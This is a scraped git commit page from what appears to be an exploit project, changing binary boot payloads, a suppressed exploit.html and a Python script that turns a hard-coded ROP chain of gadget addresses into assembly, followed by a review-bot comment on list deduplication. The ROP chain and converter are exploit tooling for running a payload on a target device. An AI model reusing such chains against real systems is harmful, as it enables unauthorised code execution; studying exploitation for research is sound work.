
NOT WORKING

pull/2/head
Winbagility 2 years ago
parent
commit
e5f1d8658c
4 changed files with 9 additions and 3 deletions
  1. BIN
      payload/boot.elf
  2. BIN
      payload/boot_.elf
  3. 2
    2
      payload/exploit.html
  4. 7
    1
      ropChainToAsm.py

BIN
payload/boot.elf


BIN
payload/boot_.elf


+ 2
- 2
payload/exploit.html
File diff suppressed because it is too large


+ 7
- 1
ropChainToAsm.py

@@ -10,7 +10,13 @@
# ropchain_appendu32(0x01800000)
# in ropchainBuilder.html
ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
ropChainAddresses = ['00000000', '00000001', '010204C8', '01023F88', '010240B0', '01035FC8', '010376C0', '0107DD70', '01080274', '01800000', 'FFFF2222', 'FFFF3333']

#Generate a list of each value used in the ROP chain for optimization purposes
#Cause no need to load the value in multiple times
ropChainAddresses = []
for i in ropChain:
if not i in ropChainAddresses:
ropChainAddresses.append(i)

# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size
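Review bot: The loop that rebuilds `ropChainAddresses` from `ropChain` yields the values in first-seen order, whereas the literal list directly above it is in ascending order, so the generated list is not identical to the hand-written one. The rendered page has lost its +/- markers, so this assumes the literal is the one line the commit removes; if it is kept, the `ropChainAddresses = []` below it makes it dead code. If anything after the hunk (not visible here) depends on the order, `ropChainAddresses = sorted(set(ropChain))` reproduces the earlier list exactly in one line; otherwise `list(dict.fromkeys(ropChain))` keeps first-seen order without rescanning the list for every element. In either form, write the membership test as `if i not in ropChainAddresses:` rather than `if not i in ...`, and extend the comment to say the list is derived so it cannot drift out of sync with `ropChain`.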
